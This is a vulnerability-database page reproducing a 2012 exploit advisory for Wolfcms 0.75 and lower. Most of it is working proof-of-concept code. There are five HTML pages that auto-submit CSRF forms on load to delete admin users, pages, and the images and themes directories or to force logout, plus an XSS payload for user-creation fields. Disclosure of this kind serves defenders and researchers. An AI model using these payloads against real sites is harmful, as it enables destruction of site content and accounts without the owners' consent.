Lucene search
K

Wolfcms <= 0.75 Multiple Vulnerabilities (CSRF - XSS)

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 10 Views

Wolfcms vulnerabilities in CSRF and XS

Code

                                                +--------------------------------------------------------------------------------------------------------------------------------+
# Exploit Title    : Wolfcms &#60;= 0.75 Multiple Vulnerabilities (CSRF - XSS) 
# Date             : 22-03-2012
# Author           : Ivano Binetti (http://www.ivanobinetti.com)
# Software link    : http://wolfcms.googlecode.com/files/wolfcms_075.zip
# Vendor site      : http://www.wolfcms.org/
# Version          : 0.75 and lower 
# Tested on        : Debian Squeeze (6.0) 
# Original Advisory: http://www.webapp-security.com/2012/03/wolfcms/
+--------------------------------------------------------------------------------------------------------------------------------+
Summary
1)Introduction
2)Vulnerabilities Description
3)Exploit
 3.1 CSRF - Delete Admin/User
 3.2 CSRF - Delete Pages
 3.3 CSRF - Delete &#34;images&#34; directory
 3.4 CSRF - Delete &#34;themes&#34; directory
 3.5 CSRF (Force Logout)
 3.6 XSS 
+--------------------------------------------------------------------------------------------------------------------------------+
1)Introduction
Wolfcms is a &#34;ligh-weight, fast, simple and powerful&#34; cms.

2)Vulnerabilities Description
Wolfcms 0.75 (and lower) is prone to multiple CSRF vulnerabilities that allow to delete admin/user, delete web pages, delete 
&#34;images&#34; and &#34;themes&#34; directory, force logout  when an authenticated admin/user browses a special crafted web page.
This cms is also affected by XSS vulnerabilities in &#34;wolfcms/admin/user/add&#34; pages due to an improper input sanitization of 
&#34;user[name]&#34;, &#34;user[email]&#34; and &#34;user[username]&#34; parameters passed via POST http method.

3)Exploit
 3.1 CSRF (Delete Admin/User)
 &#60;html&#62;
 &#60;body onload=&#34;javascript:document.forms[0].submit()&#34;&#62;
 &#60;form method=&#34;POST&#34; name=&#34;form0&#34; action=&#34;http://&#60;wolfcms_ip&#62;:80/admin/user/delete/2&#34;&#62;
 &#60;/form&#62;
 &#60;/body&#62;
 &#60;/html&#62;

 3.2 CSRF (Delete Pages)
 &#60;html&#62;
 &#60;body onload=&#34;javascript:document.forms[0].submit()&#34;&#62;
 &#60;form method=&#34;POST&#34; name=&#34;form0&#34; action=&#34;http://&#60;wolfcms_ip&#62;:80/admin/page/delete/1&#34;&#62;
 &#60;/form&#62;
 &#60;/body&#62;
 &#60;/html&#62; 
 
 3.3 CSRF - Delete &#34;images&#34; directory
 &#60;html&#62;
 &#60;body onload=&#34;javascript:document.forms[0].submit()&#34;&#62;
 &#60;form method=&#34;POST&#34; name=&#34;form0&#34; action=&#34;http://&#60;wolfcms_ip&#62;:80/admin/plugin/file_manager/delete/images&#34;&#62;
 &#60;/form&#62;
 &#60;/body&#62;
 &#60;/html&#62; 

 3.4 CSRF - Delete &#34;themes&#34; directory
 &#60;html&#62;
 &#60;body onload=&#34;javascript:document.forms[0].submit()&#34;&#62;
 &#60;form method=&#34;POST&#34; name=&#34;form0&#34; action=&#34;http://&#60;wolfcms_ip&#62;:80/admin/plugin/file_manager/delete/themes&#34;&#62;
 &#60;/form&#62;
 &#60;/body&#62;
 &#60;/html&#62;
 

 3.5 CSRF (Force Logout)
 &#60;html&#62;
 &#60;body onload=&#34;javascript:document.forms[0].submit()&#34;&#62;
 &#60;form method=&#34;POST&#34; name=&#34;form0&#34; action=&#34;http://&#60;wolfcms_ip&#62;:80/admin/login/logout&#34;&#62;
 &#60;/form&#62;
 &#60;/body&#62;
 &#60;/html&#62;


 3.6 XSS
 To exploit &#34;Name&#34; and &#34;Username&#34; &#34;E-mail&#34; fields: 
 &#34;&#62;&#60;script&#62;alert(&#34;XSS&#34;)&#60;/script&#62; 

 
+--------------------------------------------------------------------------------------------------------------------------------+
  
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
10